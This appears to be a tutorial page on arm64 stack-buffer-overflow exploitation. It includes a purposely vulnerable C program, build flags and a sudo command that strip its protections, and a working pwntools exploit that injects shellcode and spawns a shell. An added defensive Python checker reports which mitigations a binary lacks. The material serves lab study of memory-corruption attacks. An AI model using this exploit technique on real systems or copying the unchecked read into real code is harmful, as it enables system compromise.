# Stack Shellcode - arm64

Find an introduction to arm64 in:

{% content-ref url="/pages/9xyQvIb3WYv4XpLvSgct" %}
[Introduction to ARM64v8](/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
{% endcontent-ref %}

## Code

```c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
    char buffer[64];
    // 64-byte buffer, but up to 256 bytes are read: the excess overwrites the
    // saved frame pointer and return address on the stack.
    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
    vulnerable_function();
    return 0;
}
```

Compile without PIE, canary and NX:

{% code overflow="wrap" %}

```bash
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
```

{% endcode %}

## No ASLR & no canary - Stack Overflow
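Before turning ASLR off, it is worth being able to confirm which protections the compile line above actually strips from the binary, since the exploit only works when all three are absent. The following added example (not HackTricks' code) reads the ELF64 header and program headers directly: PIE shows as `e_type == ET_DYN`, NX as a `PT_GNU_STACK` header without the executable flag (`-z execstack` is what sets that flag), and the stack canary is detected heuristically by the presence of the `__stack_chk_fail` name, which any object built with `-fstack-protector` imports. The two sample images are constructed fixtures mimicking the page's build and a default hardened build; they are not loadable binaries.

```python
import struct

# ELF64 constants (from the ELF specification)
ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3                 # fixed-address executable vs. position-independent (PIE)
EM_X86_64, EM_AARCH64 = 0x3E, 0xB7
PT_GNU_STACK = 0x6474E551              # program header describing stack permissions
PF_X, PF_W, PF_R = 1, 2, 4
MACHINES = {EM_X86_64: "x86-64", EM_AARCH64: "aarch64"}


def elf_mitigations(data: bytes) -> dict:
    """Report PIE, NX and stack-canary status of an ELF64 little-endian image.

    PIE:    e_type == ET_DYN.
    NX:     a PT_GNU_STACK header exists and does not carry PF_X
            (`-z execstack` sets PF_X; a missing header is treated as NX off).
    Canary: heuristic, the `__stack_chk_fail` name is present somewhere in the
            file (imported by any object built with -fstack-protector).
    """
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian images are handled here")
    e_type, e_machine = struct.unpack_from("<HH", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    gnu_stack_flags = None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 8 > len(data):
            break                      # truncated program header table
        p_type, p_flags = struct.unpack_from("<II", data, off)
        if p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags

    return {
        "arch": MACHINES.get(e_machine, hex(e_machine)),
        "pie": e_type == ET_DYN,
        "nx": gnu_stack_flags is not None and not (gnu_stack_flags & PF_X),
        "canary": b"__stack_chk_fail" in data,
    }


def missing_mitigations(report: dict) -> list:
    """Names of the protections a report shows as absent, in checksec order."""
    names = [("pie", "PIE"), ("nx", "NX"), ("canary", "stack canary")]
    return [label for key, label in names if not report[key]]


def build_sample_elf(e_type: int, stack_flags: int, with_canary_symbol: bool) -> bytes:
    """Constructed test fixture: a bare ELF64/AArch64 header followed by a
    single PT_GNU_STACK program header. It is not a loadable binary."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, little-endian, EV_CURRENT
    header = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        e_type, EM_AARCH64, 1,   # e_type, e_machine, e_version
        0x400000, 64, 0,         # e_entry, e_phoff (right after the header), e_shoff
        0, 64, 56, 1,            # e_flags, e_ehsize, e_phentsize, e_phnum
        64, 0, 0,                # e_shentsize, e_shnum, e_shstrndx
    )
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    tail = b"__stack_chk_fail\x00" if with_canary_symbol else b""
    return header + phdr + tail


# What the page's build line produces: -no-pie, -fno-stack-protector, -z execstack
PAGE_BUILD = build_sample_elf(ET_EXEC, PF_R | PF_W | PF_X, with_canary_symbol=False)
# The same program built with the compiler defaults left in place (PIE, non-executable stack, canary)
HARDENED_BUILD = build_sample_elf(ET_DYN, PF_R | PF_W, with_canary_symbol=True)

if __name__ == "__main__":
    for label, image in (("page build", PAGE_BUILD), ("hardened build", HARDENED_BUILD)):
        report = elf_mitigations(image)
        print(f"{label}: {report}  missing: {missing_mitigations(report)}")
    # On a real file: elf_mitigations(open("./bof", "rb").read())
```

Run against the real `./bof` from the compile step, the report should show `pie`, `nx` and `canary` all `False`; if any of them is `True`, the binary was not built with the flags above and the exploit in the next section will not behave as described. The canary check is a string heuristic, so a binary that merely embeds that name for another reason would be misreported; parsing `.dynsym` properly is the strict alternative.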

To disable ASLR, run:

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

To find the offset of the bof, [**check this link**](/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md#finding-the-offset).

Exploit:

```python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()
```

The only "complicated" thing is finding the address in the stack to call. In my case, I generated the exploit with the address found using gdb, but when exploiting it didn't work (because the stack address changed a bit).

I opened the generated **`core` file** (`gdb ./bof ./core`) and checked the real address of the start of the shellcode.

